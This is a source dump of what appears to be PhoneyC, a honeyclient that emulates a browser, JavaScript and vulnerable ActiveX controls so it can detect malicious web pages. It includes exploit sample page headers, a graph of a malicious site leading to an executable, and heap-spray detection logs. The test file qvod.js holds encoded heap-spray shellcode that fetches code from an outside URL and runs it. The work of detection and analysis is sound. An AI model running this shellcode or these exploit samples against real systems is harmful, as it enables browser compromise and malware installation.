36 |
37 |
38 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/test-roundtrip.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import t
6 |
7 | @t.echo()
8 | def test_roundtrip_int(echo):
9 | t.eq(echo(42), 42)
10 |
11 | @t.echo()
12 | def test_roundtrip_float(echo):
13 | t.eq(echo(42.5), 42.5)
14 |
15 | @t.echo()
16 | def test_roundtrip_str(echo):
17 | t.eq(echo("spam"), "spam")
18 |
19 | @t.echo()
20 | def test_round_trip_None(echo):
21 | t.eq(echo(None), None)
22 |
23 | @t.echo()
24 | def test_roundtrip_True(echo):
25 | t.eq(echo(True), True)
26 |
27 | @t.echo()
28 | def test_roundtrip_False(echo):
29 | t.eq(echo(False), False)
30 |
31 | @t.echo()
32 | def test_roundtrip_inf(echo):
33 | t.eq(echo(1E500*1E500), 1E500*1E500)
34 |
35 | @t.echo()
36 | def test_roundtrip_nan(echo):
37 | t.eq(type(echo(1E500/1E500)), float)
38 | t.ne(echo(1E500/1E500), 1E500/1E500)
39 |
--------------------------------------------------------------------------------
/doc/papers/leet09/pics/example_walk.dot:
--------------------------------------------------------------------------------
1 | digraph "rrrryyyaa.cn/1/123.htm" {
2 | "rrrryyyaa.cn/1/123.htm" [shape=box, color=lightblue];
3 | "rrrryyyaa.cn/1.exe" [shape=box, color=red];
4 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/sina.htm";
5 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/re11.htm";
6 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/flash.htm";
7 | "rrrryyyaa.cn/1/flash.htm" -> "rrrryyyaa.cn/1/fl/ffl.html";
8 | "rrrryyyaa.cn/1/flash.htm" -> "rrrryyyaa.cn/1/fl/ifl.html";
9 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/as.htm";
10 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/office.htm";
11 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/lz.htm";
12 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/14.htm";
13 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/NCTAudioFile.htm";
14 | "rrrryyyaa.cn/1/123.htm" -> "rrrryyyaa.cn/1/re10.htm";
15 | "rrrryyyaa.cn/1/NCTAudioFile.htm" -> "rrrryyyaa.cn/1.exe";
16 | }
--------------------------------------------------------------------------------
/samples/SonicWallNetExtenderAddRouteEntry.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
24 |
25 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/test-runtime.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import t
6 |
7 | @t.rt()
8 | def test_creating_runtime(rt):
9 | t.ne(rt, None)
10 |
11 | def test_create_no_memory():
12 | rt = t.spidermonkey.Runtime(1)
13 | t.raises(RuntimeError, rt.new_context)
14 |
15 | def test_exceed_memory():
16 | # This test actually tests nothing. I'm leaving it for a bit to
17 | # see if I hear about the bug noted below.
18 | rt = t.spidermonkey.Runtime(50000)
19 | cx = rt.new_context()
20 | script = "var b = []; var f = 1000; while(f-- > 0) b.push(2.456);"
21 | # I had this script below original and it triggers some sort of
22 | # bug in the JS VM. I even reduced the test case outside of
23 | # python-spidermonkey to show it. No word from the SM guys.
24 | # script = "var b = []; for(var f in 100000) b.push(2.456);"
25 | cx.execute(script)
26 |
27 |
--------------------------------------------------------------------------------
/samples/VLC.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/modules/honeyjs/spidermonkey/double.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2009 Paul J. Davis
3 | *
4 | * This file is part of the python-spidermonkey package released
5 | * under the MIT license.
6 | *
7 | */
8 |
9 | #include "spidermonkey.h"
10 |
11 | jsval
12 | py2js_double(Context* cx, PyObject* obj)
13 | {
14 | jsval rval = JSVAL_VOID;
15 | double pyval = PyFloat_AsDouble(obj);
16 | if(PyErr_Occurred()) goto error;
17 |
18 | if(!JS_NewNumberValue(cx->cx, pyval, &rval))
19 | {
20 | PyErr_SetString(PyExc_ValueError, "Failed to convert number.");
21 | goto error;
22 | }
23 |
24 | goto success;
25 |
26 | error:
27 | success:
28 | return rval;
29 | }
30 |
31 | PyObject*
32 | js2py_double(Context* cx, jsval val)
33 | {
34 | double rval;
35 |
36 | if(!JS_ValueToNumber(cx->cx, val, &rval))
37 | {
38 | PyErr_SetString(PyExc_TypeError, "Invalid JS number value.");
39 | return NULL;
40 | }
41 |
42 | return PyFloat_FromDouble(rval);
43 | }
44 |
--------------------------------------------------------------------------------
/test/qvod.js:
--------------------------------------------------------------------------------
1 | var Cuteqqaddress;
2 | Cuteqqaddress = 0x05050505;
3 | var EvilCute;
4 | EvilCute = window['unescape']("%u90"+"90" +
5 | "%u9090%u54eb%u758b%u8b3c%u3574" +
6 | "%u0378%u56f5%u768b%u0320%u33f5" +
7 | "%u49c9%uad41%udb33%u0f36%u14be" +
8 | "%u3828%u74f2%uc108%u0dcb%uda03" +
9 | "%ueb40%u3bef%u75df%u5ee7%u5e8b" +
10 | "%u0324%u66dd%u0c8b%u8b4b%u1c5e" +
11 | "%udd03%u048b%u038b%uc3c5%u7275" +
12 | "%u6d6c%u6e6f%u642e%u6c6c%u4300" +
13 | "%u5c3a%u2e55%u7865%u0065%uc033" +
14 | "%u0364%u3040%u0c78%u408b%u8b0c" +
15 | "%u1c70%u8bad%u0840%u09eb%u408b" +
16 | "%u8d34%u7c40%u408b%u953c%u8ebf" +
17 | "%u0e4e%ue8ec%uff84%uffff%uec83" +
18 | "%u8304%u242c%uff3c%u95d0%ubf50" +
19 | "%u1a36%u702f%u6fe8%uffff%u8bff" +
20 | "%u2454%u8dfc%uba52%udb33%u5353" +
21 | "%ueb52%u5324%ud0ff%ubf5d%ufe98" +
22 | "%u0e8a%u53e8%uffff%u83ff%u04ec" +
23 | "%u2c83%u6224%ud0ff%u7ebf%ue2d8" +
24 | "%ue873%uff40%uffff%uff52%ue8d0" +
25 | "%uffd7%uffff%u7468%u7074%u2f3a%u772f%u7777%u332e%u3036%u632e%u2e6e%u7873%u7378%u706e%u2e32%u6e63%u642f%u2e35%u7363%u0073");
26 |
27 |
--------------------------------------------------------------------------------
/ActiveX/modules/HPInfo:
--------------------------------------------------------------------------------
1 | # HP Info Center ActiveX Control
2 | # CVE-2007-6331, CVE-2007-6332, CVE-2007-6333
3 |
4 |
5 | def LaunchApp(prog, args, unk):
6 | add_alert("HP Info Center LaunchApp called to run: " + prog + " " + args)
7 |
8 | def SetRegValue(key, section, keyname, value):
9 | add_alert("HP Info Center SetRegValue: " + str(key) + "/" + str(section) + "/" + str(keyname) + " set to " + str(value))
10 |
11 | def GetRegValue(key, section, keyname):
12 | add_alert("HP Info Center GetRegValue, reading: " + key + "/" + section + "/" + keyname)
13 |
14 | def EvaluateRules():
15 | add_alert("HP Info Center EvaluateRules")
16 |
17 | def SaveToFile(path):
18 | add_alert("HP Software Update SaveToFile(), writes to " + path)
19 |
20 | def ProcessRegistryData(parm):
21 | add_alert("HP Info Center ProcessRegistryData: " + parm)
22 |
23 | self.LaunchApp = LaunchApp
24 | self.SetRegValue = SetRegValue
25 | self.GetRegValue = GetRegValue
26 | self.EvaluateRules = EvaluateRules
27 | self.SaveToFile = SaveToFile
28 | self.ProcessRegistryData = ProcessRegistryData
29 |
--------------------------------------------------------------------------------
/samples/4869.html:
--------------------------------------------------------------------------------
1 |
10 |
11 |
12 | Gateway Weblaunch ActiveX Control Insecure Method Exploit
13 |
22 |
23 |
24 |
27 |
28 |
29 |
30 | # milw0rm.com [2008-01-08]
31 |
--------------------------------------------------------------------------------
/DOM/Array.py:
--------------------------------------------------------------------------------
1 |
2 | class Array(object):
3 | def __init__(self, length=0):
4 | assert length >= 0
5 | self.length = length
6 |
7 | def __getitem__(self, key):
8 | if key in self.__dict__:
9 | return self.__dict__[key]
10 | return None
11 |
12 | def __setitem__(self, key, value):
13 | self.__dict__[key] = value
14 | if isinstance(key, int) and key >= self.length:
15 | self.length = key + 1
16 |
17 | def append(self, obj):
18 | self[self.length] = obj
19 |
20 | def remove(self, obj):
21 | for key in self.__dict__:
22 | if self.__dict__[key] == obj:
23 | del self.__dict__[key]
24 | if isinstance(key, int) and key >= 0:
25 | for k in self.__dict__:
26 | if isinstance(k, int) and k > key:
27 | self.__dict__[k - 1] = self.__dict__[k]
28 | del self.__dict__[k]
29 | length -= 1
30 | break
31 |
32 | def push(self, obj):
33 | self.append(obj)
34 |
35 |
--------------------------------------------------------------------------------
/samples/HPInfo_LaunchApp.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
--------------------------------------------------------------------------------
/samples/NessusScanCtrl.htm:
--------------------------------------------------------------------------------
1 |
2 |
8 |
9 |
10 |
11 |
15 |
16 |
17 |
18 |
24 |
25 |
26 |
27 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/ActiveX/modules/PDFAcroPDF:
--------------------------------------------------------------------------------
1 | # execute arbitrary code via a long argument string to the (1) src, (2) setPageMode, (3) setLayoutMode, and (4) setNamedDest methods in an AcroPDF ActiveX control
2 | # CVE-2006-6236
3 |
4 | def Setsrc(* args):
5 | add_alert('AcroPDF ActiveX control is to execute arbitrary code via a long argument string to the src')
6 |
7 |
8 | def setPageMode(* args):
9 | add_alert('AcroPDF ActiveX control is to execute arbitrary code via a long argument string to the setPageMode()')
10 |
11 |
12 | def setLayoutMode(* args):
13 | add_alert('AcroPDF ActiveX control is to execute arbitrary code via a long argument string to the setLayoutMode()')
14 |
15 |
16 | def setNamedDest(* args):
17 | add_alert('AcroPDF ActiveX control is to execute arbitrary code via a long argument string to the seNamedDest()')
18 |
19 | def LoadFile(arg0):
20 | if len(arg0)>6000:
21 | add_alert('AcroPDF ActiveX control is to execute arbitrary code via a long argument string to the LoadFile()')
22 |
23 | Attr2Fun['src']=Setsrc
24 |
25 | self.setPageMode=setPageMode
26 | self.setLayoutMode=setLayoutMode
27 | self.setNamedDest=setNamedDest
28 | self.LoadFile=LoadFile
29 |
--------------------------------------------------------------------------------
/modules/honeyjs/THANKS:
--------------------------------------------------------------------------------
1 |
2 | Thanks For Patches and Pointers
3 | ===============================
4 |
5 | benoitc
6 | * build system tweaks, compiling on OpenBSD
7 |
8 | Mark Lee
9 | * Patch for iterating JS arrays in Python
10 | * Patch to allow linking against Xulrunner's libmozjs
11 |
12 | sk89q
13 | * Info for FreeBSD builds
14 |
15 | spahl
16 | * Heads up on the signal hack and fix for a compiler warning.
17 | * Bug #16 integer property lookup failure report and fix.
18 | * Bug #17 add_property segfault when value is null.
19 |
20 | Mike West
21 | * Reported bug in Context.max_time
22 | * Better test for test_exceeds_time
23 | * Reported missing pkg-config requirement
24 |
25 | Riccardo Pelizzi
26 | * Bug report for global handlers and "function foo() {}" syntax.
27 |
28 | Keiji Costantini
29 | * Bug report on the memory limit test.
30 |
31 | Richard Boulton
32 | * Initial patch for filtering Python access.
33 |
34 | marc
35 | * Report on Context turnover causing segfaults.
36 |
37 | Scott T Silliman
38 | * Provided Gentoo package names.
39 |
40 | Roberto De Almeida
41 | * Pointer on MANIFEST.in
42 |
--------------------------------------------------------------------------------
/modules/honeyjs/LICENSE:
--------------------------------------------------------------------------------
1 | Copyright (c) 2009 Paul J. Davis
2 |
3 | Permission is hereby granted, free of charge, to any person
4 | obtaining a copy of this software and associated documentation
5 | files (the "Software"), to deal in the Software without
6 | restriction, including without limitation the rights to use,
7 | copy, modify, merge, publish, distribute, sublicense, and/or sell
8 | copies of the Software, and to permit persons to whom the
9 | Software is furnished to do so, subject to the following
10 | conditions:
11 |
12 | The above copyright notice and this permission notice shall be
13 | included in all copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
16 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
17 | OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
18 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
19 | HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
20 | WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
21 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22 | OTHER DEALINGS IN THE SOFTWARE.
23 |
--------------------------------------------------------------------------------
/ActiveX/modules/SnapshotViewer:
--------------------------------------------------------------------------------
1 | # Microsoft Access Snapshot Viewer
2 | # CVE-2008-2463
3 |
4 | object = self
5 |
6 | def PrintSnapshot(SnapshotPath = None, CompressedPath = None):
7 | global object
8 |
9 | from HTTP.HttpHoneyClient import hc
10 | import hashlib
11 |
12 | if SnapshotPath:
13 | object.SnapshotPath = SnapshotPath
14 | if CompressedPath:
15 | object.CompressedPath = CompressedPath
16 |
17 | add_alert('[*] Microsoft Access Snapshot Viewer')
18 | add_alert("[*] SnapshotPath : " + object.SnapshotPath)
19 | add_alert("[*] CompressedPath : " + object.CompressedPath)
20 |
21 | url = object.SnapshotPath
22 | urls = set()
23 | if url.startswith("/"):
24 | for base in os.environ['PHONEYC_URLBASE'].split(";"):
25 | urls.add(base + url)
26 | else:
27 | urls.add(url)
28 |
29 | for url in urls:
30 | print "[*] Fetching %s" % (url, )
31 | h = hashlib.md5()
32 | content, headers = hc.get(str(url))
33 | h.update(content)
34 | filename = "log/downloads/binaries/%s" % (h.hexdigest(), )
35 | add_alert("[*] Saving File: " + filename)
36 | fd = open(filename, 'wb')
37 | fd.write(content)
38 | fd.close()
39 |
40 | self.PrintSnapshot = PrintSnapshot
41 |
--------------------------------------------------------------------------------
/samples/4909.html:
--------------------------------------------------------------------------------
1 |
8 |
9 |
10 | Macrovision FlexNet DownloadManager Insecure Methods Exploit
11 |
27 |
28 |
29 |
32 |
33 |
34 |
35 | # milw0rm.com [2008-01-14]
36 |
--------------------------------------------------------------------------------
/samples/CreativeSoftAttack.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
25 |
26 |
27 |
28 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/test-iterate.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import t
6 |
7 | js_for_script = """
8 | var ret = [];
9 | for(var v in data) {ret.push(v);}
10 | ret;
11 | """
12 |
13 | js_for_each_script = """
14 | var ret = [];
15 | for each(var v in data) {ret.push(v);}
16 | ret;
17 | """
18 |
19 | @t.glbl("data", {"foo": "bar", "baz": "bam"})
20 | def test_iter_py_map(cx, glbl):
21 | t.eq(cx.execute(js_for_script), ["foo", "baz"])
22 | t.eq(cx.execute(js_for_each_script), ["bar", "bam"])
23 |
24 | @t.glbl("data", ["a", 2, "zing!"])
25 | def test_iter_py_array(cx, glbl):
26 | t.eq(cx.execute(js_for_script), [0, 1, 2])
27 | t.eq(cx.execute(js_for_each_script), ["a", 2, "zing!"])
28 |
29 | @t.cx()
30 | def test_iter_js_object(cx):
31 | ret = cx.execute('var f = {"foo": 1, "domino": "daily"}; f;')
32 | items = set(["domino", "foo"])
33 | for k in ret:
34 | t.isin(k, items)
35 | items.remove(k)
36 |
37 | @t.cx()
38 | def test_iter_js_array(cx):
39 | ret = cx.execute('["foo", 1, "bing", [3, 6]]')
40 | t.eq([k for k in ret], ["foo", 1, "bing", [3, 6]])
41 |
--------------------------------------------------------------------------------
/result/qvod.txt:
--------------------------------------------------------------------------------
1 | PYTHONPATH='lib/python:' python main.py http://172.31.25.227/honeyjs/qvod.html
2 |
3 | DEBUG: Alerts:
4 | ====================================
5 | |--------AID:1----------
6 | |ATYPE:ALERT_HEAPSPRAY
7 | |MESSAGE:Heapspray Detected!
8 | |HIT:8
9 | |LENGTH:4194006
10 | |ENTROPY:0.0
11 | |MISC:{'sledge_char': '\x05', 'sec_char_cnt': 0, 'sledge_cnt': 4194006, 'sec_char': '\x00'}
12 | ====================================
13 | |--------AID:2----------
14 | |ATYPE:ALERT_HEAPSPRAY
15 | |MESSAGE:Heapspray Detected!
16 | |HIT:1
17 | |LENGTH:4194006
18 | |ENTROPY:0.0
19 | |MISC:{'sledge_cnt': 4194006, 'sec_char_cnt': 0, 'sec_char': '\x00', 'sledge_char': '\x05'}
20 | ====================================
21 | |--------AID:3----------
22 | |ATYPE:ALERT_HEAPSPRAY
23 | |MESSAGE:Heapspray Detected!
24 | |HIT:1
25 | |LENGTH:4194248
26 | |ENTROPY:0.00125026921766
27 | |MISC:{'sledge_cnt': 4194006, 'sec_char_cnt': 7, 'sec_char': '\x03', 'sledge_char': '\x05'}
28 | ====================================
29 | |--------AID:4----------
30 | |ATYPE:ALERT_HEAPSPRAY
31 | |MESSAGE:Heapspray Detected!
32 | |HIT:20
33 | |LENGTH:4194248
34 | |ENTROPY:0.00125026921766
35 | |MISC:{'sledge_char': '\x05', 'sec_char_cnt': 7, 'sledge_cnt': 4194006, 'sec_char': '\x03'}
36 |
--------------------------------------------------------------------------------
/samples/4875.html:
--------------------------------------------------------------------------------
1 |
2 | -----------------------------------------------------------------------------
3 | Microsoft VFP_OLE_Server Remote Command Execution
4 | url: http://www.microsoft.com
5 |
6 | Author: shinnai
7 | mail: shinnai[at]autistici[dot]org
8 | site: http://shinnai.altervista.org
9 |
10 | This was written for educational purpose. Use it at your own risk.
11 | Author will be not responsible for any damage.
12 |
13 | Not much more to say than using "foxcommand()" function, you can
14 | run applications passed as argument.
15 |
16 | Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
17 | -----------------------------------------------------------------------------
18 |
19 |
20 |
21 |
22 |
27 |
28 |
29 |
2 | -------------------------------------------------------------------------------------------------
3 | Clever Internet ActiveX Suite 6.2 (CLINETSUITEX6.OCX) Arbitrary file download/overwrite Exploit
4 | url: http://www.clevercomponents.com/home/news.asp
5 |
6 | author: shinnai
7 | mail: shinnai[at]autistici[dot]org
8 | site: http://shinnai.altervista.org
9 |
10 | Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
11 | all software that use this ocx are vulnerable to this exploits.
12 |
13 | This control is marked as
14 | RegKey Safe for Script: True
15 | RegKey Safe for Init: True
16 | Implements IObjectSafety: True
17 | IDisp Safe: Safe for untrusted: caller, data
18 | IPStorage Safe: Safe for untrusted: caller,data
19 |
20 | Using the "GetToFile" method, you can download everything you want on a pc. This
21 | exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.
22 | -------------------------------------------------------------------------------------------------
23 |
24 |
25 |
26 |
27 |
28 |
36 |
37 |
38 |
-----------------------------------------------------------------------------
2 | Microsoft Rich Textbox Control 6.0 (SP6) "SaveFile()" Insecure Method
3 | url: http://www.microsoft.com
4 |
5 | Author: shinnai
6 | mail: shinnai[at]autistici[dot]org
7 | site: http://shinnai.altervista.org
8 |
9 | This was written for educational purpose. Use it at your own risk.
10 | Author will be not responsible for any damage.
11 |
12 | Technical details:
13 | File: RICHTX32.OCX
14 | ver.: 6.1.97.82
15 |
16 | While this GUID {3B7C8860-D78F-101B-B9B5-04021C009402} is
17 | killbited, this one {B617B991-A767-4F05-99BA-AC6FCABB102E}
18 |
19 | works fine so it is possible, using the "SaveFile()" method,
20 | to save the content of the rich textbox on a user's pc.
21 | This can be used to save, overwrite and/or corrupt arbitrary
22 | files on the system.
23 |
24 | It's marked as:
25 | RegKey Safe for Script: False
26 | RegKey Safe for Init: False
27 | Implements IObjectSafety: True
28 | IPersist Safe: Safe for untrusted: caller,data
29 | IPStorage Safe: Safe for untrusted: caller,data
30 |
31 | Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
32 | -----------------------------------------------------------------------------
33 |
34 |
2 | -----------------------------------------------------------------------------
3 | MW6 Technologies QRCode ActiveX 3.0 (MW6QRCode.dll) Remote File Overwrite
4 | url: www.mw6tech.com
5 |
6 | Author: shinnai
7 | mail: shinnai[at]autistici[dot]org
8 | site: http://shinnai.altervista.org
9 |
10 | This was written for educational purpose. Use it at your own risk.
11 | Author will be not responsible for any damage.
12 |
13 | Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
14 |
15 | Description:
16 | This control contains two methods, "SaveAsBMP()" and "SaveAsWMF()", which
17 | write to a file specified as an argument.
18 | These can be exploited to overwrite and corrupt arbitrary files on the
19 | system in the context of the currently logged-on user.
20 |
21 | Marked as:
22 | RegKey Safe for Script: False
23 | RegKey Safe for Init: False
24 | Implements IObjectSafety: True
25 | IDisp Safe: Safe for untrusted: caller,data
26 | IPersist Safe: Safe for untrusted: caller,data
27 | IPStorage Safe: Safe for untrusted: caller,data
28 | KillBitSet: Falso
29 | -----------------------------------------------------------------------------
30 |
31 |
32 |
37 |
38 |
39 |
40 |
53 |
54 |
55 |
56 | # milw0rm.com [2007-09-18]
57 |
--------------------------------------------------------------------------------
/samples/YahooMessengerYVerInfo.htm:
--------------------------------------------------------------------------------
1 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/samples/DVRHOSTWeb.htm:
--------------------------------------------------------------------------------
1 |
2 |
20 |
21 |
--------------------------------------------------------------------------------
/samples/YahooMessengerYwcvwr_GetComponentVersion.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
43 |
44 |
--------------------------------------------------------------------------------
/samples/gom.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/samples/SSReaderPdg2_Register.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
43 |
44 |
--------------------------------------------------------------------------------
/samples/4351.html:
--------------------------------------------------------------------------------
1 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
47 |
48 |
49 | # milw0rm.com [2007-09-01]
50 |
--------------------------------------------------------------------------------
/samples/ssreader_0day.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
32 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/test/ssreader_0day.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
32 |
48 |
49 |
--------------------------------------------------------------------------------
/samples/3420.html:
--------------------------------------------------------------------------------
1 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
35 |
36 |
37 |
38 | # milw0rm.com [2007-03-06]
39 |
--------------------------------------------------------------------------------
/samples/WinZip.htm:
--------------------------------------------------------------------------------
1 |
2 |
3 |
5 |
6 |
7 |
51 |
52 |
53 |
54 |
--------------------------------------------------------------------------------
/modules/honeyjs/spidermonkey/string.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2009 Paul J. Davis
3 | *
4 | * This file is part of the python-spidermonkey package released
5 | * under the MIT license.
6 | *
7 | */
8 |
9 | #include "spidermonkey.h"
10 |
11 | JSString*
12 | py2js_string_obj(Context* cx, PyObject* str)
13 | {
14 | PyObject* conv = NULL;
15 | PyObject* encoded = NULL;
16 | JSString* ret = NULL;
17 | char* bytes;
18 | Py_ssize_t len;
19 |
20 | if(PyString_Check(str))
21 | {
22 | conv = PyUnicode_FromEncodedObject(str, "utf-8", "replace");
23 | if(conv == NULL) goto error;
24 | str = conv;
25 | }
26 | else if(!PyUnicode_Check(str))
27 | {
28 | PyErr_SetString(PyExc_TypeError, "Invalid string conversion.");
29 | goto error;
30 | }
31 |
32 | encoded = PyUnicode_AsEncodedString(str, "utf-16", "strict");
33 | if(encoded == NULL) goto error;
34 | if(PyString_AsStringAndSize(encoded, &bytes, &len) < 0) goto error;
35 | if(len < 2)
36 | {
37 | PyErr_SetString(PyExc_ValueError, "Failed to find byte-order mark.");
38 | goto error;
39 | }
40 |
41 | if(((unsigned short*) bytes)[0] != 0xFEFF)
42 | {
43 | PyErr_SetString(PyExc_ValueError, "Invalid UTF-16 BOM");
44 | goto error;
45 | }
46 |
47 | ret = JS_NewUCStringCopyN(cx->cx, (jschar*) (bytes+2), (len/2)-1);
48 |
49 | goto success;
50 |
51 | error:
52 | success:
53 | Py_XDECREF(conv);
54 | Py_XDECREF(encoded);
55 | return ret;
56 | }
57 |
58 | jsval
59 | py2js_string(Context* cx, PyObject* str)
60 | {
61 | JSString* val = py2js_string_obj(cx, str);
62 | if(val == NULL)
63 | {
64 | PyErr_Clear();
65 | return JSVAL_VOID;
66 | }
67 |
68 | return STRING_TO_JSVAL(val);
69 | }
70 |
71 | PyObject*
72 | js2py_string(Context* cx, jsval val)
73 | {
74 | JSString* str;
75 | jschar* bytes;
76 | size_t len;
77 |
78 | if(!JSVAL_IS_STRING(val))
79 | {
80 | PyErr_SetString(PyExc_TypeError, "Value is not a JS String.");
81 | return NULL;
82 | }
83 |
84 | str = JSVAL_TO_STRING(val);
85 | len = JS_GetStringLength(str);
86 | bytes = JS_GetStringChars(str);
87 |
88 | return PyUnicode_Decode((const char*) bytes, len*2, "utf-16", "strict");
89 | }
90 |
--------------------------------------------------------------------------------
/modules/honeyjs/tests/test-context.py:
--------------------------------------------------------------------------------
1 | # Copyright 2009 Paul J. Davis
2 | #
3 | # This file is part of the python-spidermonkey package released
4 | # under the MIT license.
5 | import t
6 | import time
7 |
8 | @t.rt()
9 | def test_no_provided_runtime(rt):
10 | t.raises(TypeError, t.spidermonkey.Context)
11 |
12 | @t.rt()
13 | def test_invalid_runtime(rt):
14 | t.raises(TypeError, t.spidermonkey.Context, 0)
15 |
16 | @t.rt()
17 | def test_creating_new_context(rt):
18 | t.eq(isinstance(rt.new_context(), t.spidermonkey.Context), True)
19 |
20 | @t.cx()
21 | def test_basic_execution(cx):
22 | t.eq(cx.execute("var x = 4; x * x;"), 16)
23 | t.lt(cx.execute("22/7;") - 3.14285714286, 0.00000001)
24 |
25 | @t.cx()
26 | def test_reentry(cx):
27 | cx.execute("var x = 42;")
28 | t.eq(cx.execute("x;"), 42)
29 |
30 | @t.cx()
31 | def test_null(cx):
32 | cx.execute("x = null;")
33 | t.eq(cx.execute("x;"), None)
34 |
35 | @t.cx()
36 | def test_get_set_limits(cx):
37 | t.eq(cx.max_time(), 0)
38 | t.eq(cx.max_memory(), 0)
39 | t.eq(cx.max_time(10), 0) # Accessors return previous value.
40 | t.eq(cx.max_time(), 10)
41 | t.eq(cx.max_memory(10), 0)
42 | t.eq(cx.max_memory(), 10)
43 |
44 | @t.cx()
45 | def test_exceed_time(cx):
46 | script = """
47 | var time = function() {return (new Date()).getTime();};
48 | var start = time();
49 | while((time() - start) < 100000) {}
50 | """
51 | cx.max_time(1)
52 | t.raises(SystemError, cx.execute, script)
53 |
54 | @t.cx()
55 | def test_does_not_exceed_time(cx):
56 | cx.max_time(1)
57 | func = cx.execute("function() {return 1;}")
58 | time.sleep(1.1)
59 | cx.execute("var f = 2;");
60 | time.sleep(1.1)
61 | func()
62 | time.sleep(1.1)
63 | cx.execute("f;");
64 |
65 | @t.cx()
66 | def test_exceed_memory(cx):
67 | cx.max_memory(10000)
68 | script = "var f = []; var b = 1000000; while(b-- > 0) f[f.length] = b*0.9;"
69 | t.raises(MemoryError, cx.execute, script)
70 |
71 | @t.cx()
72 | def test_small_limit(cx):
73 | cx.max_memory(1)
74 | t.raises(MemoryError, cx.execute, "var f = []; while(true) f.push(2.3);");
75 |
76 | @t.cx()
77 | def test_does_not_exceed_memory(cx):
78 | cx.max_memory(10000)
79 | script = "var f = 2; f;"
80 | cx.execute(script)
81 |
82 |
--------------------------------------------------------------------------------
/modules/honeyjs/spidermonkey/libjs/jsmath.h:
--------------------------------------------------------------------------------
1 | /* ***** BEGIN LICENSE BLOCK *****
2 | * Version: MPL 1.1/GPL 2.0/LGPL 2.1
3 | *
4 | * The contents of this file are subject to the Mozilla Public License Version
5 | * 1.1 (the "License"); you may not use this file except in compliance with
6 | * the License. You may obtain a copy of the License at
7 | * http://www.mozilla.org/MPL/
8 | *
9 | * Software distributed under the License is distributed on an "AS IS" basis,
10 | * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
11 | * for the specific language governing rights and limitations under the
12 | * License.
13 | *
14 | * The Original Code is Mozilla Communicator client code, released
15 | * March 31, 1998.
16 | *
17 | * The Initial Developer of the Original Code is
18 | * Netscape Communications Corporation.
19 | * Portions created by the Initial Developer are Copyright (C) 1998-1999
20 | * the Initial Developer. All Rights Reserved.
21 | *
22 | * Contributor(s):
23 | *
24 | * Alternatively, the contents of this file may be used under the terms of
25 | * either of the GNU General Public License Version 2 or later (the "GPL"),
26 | * or the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
27 | * in which case the provisions of the GPL or the LGPL are applicable instead
28 | * of those above. If you wish to allow use of your version of this file only
29 | * under the terms of either the GPL or the LGPL, and not to allow others to
30 | * use your version of this file under the terms of the MPL, indicate your
31 | * decision by deleting the provisions above and replace them with the notice
32 | * and other provisions required by the GPL or the LGPL. If you do not delete
33 | * the provisions above, a recipient may use your version of this file under
34 | * the terms of any one of the MPL, the GPL or the LGPL.
35 | *
36 | * ***** END LICENSE BLOCK ***** */
37 |
38 | /* -*- Mode: C; tab-width: 8 -*-
39 | * Copyright (C) 1998-1999 Netscape Communications Corporation, All Rights Reserved.
40 | */
41 |
42 | #ifndef jsmath_h___
43 | #define jsmath_h___
44 | /*
45 | * JS math functions.
46 | */
47 |
48 | JS_BEGIN_EXTERN_C
49 |
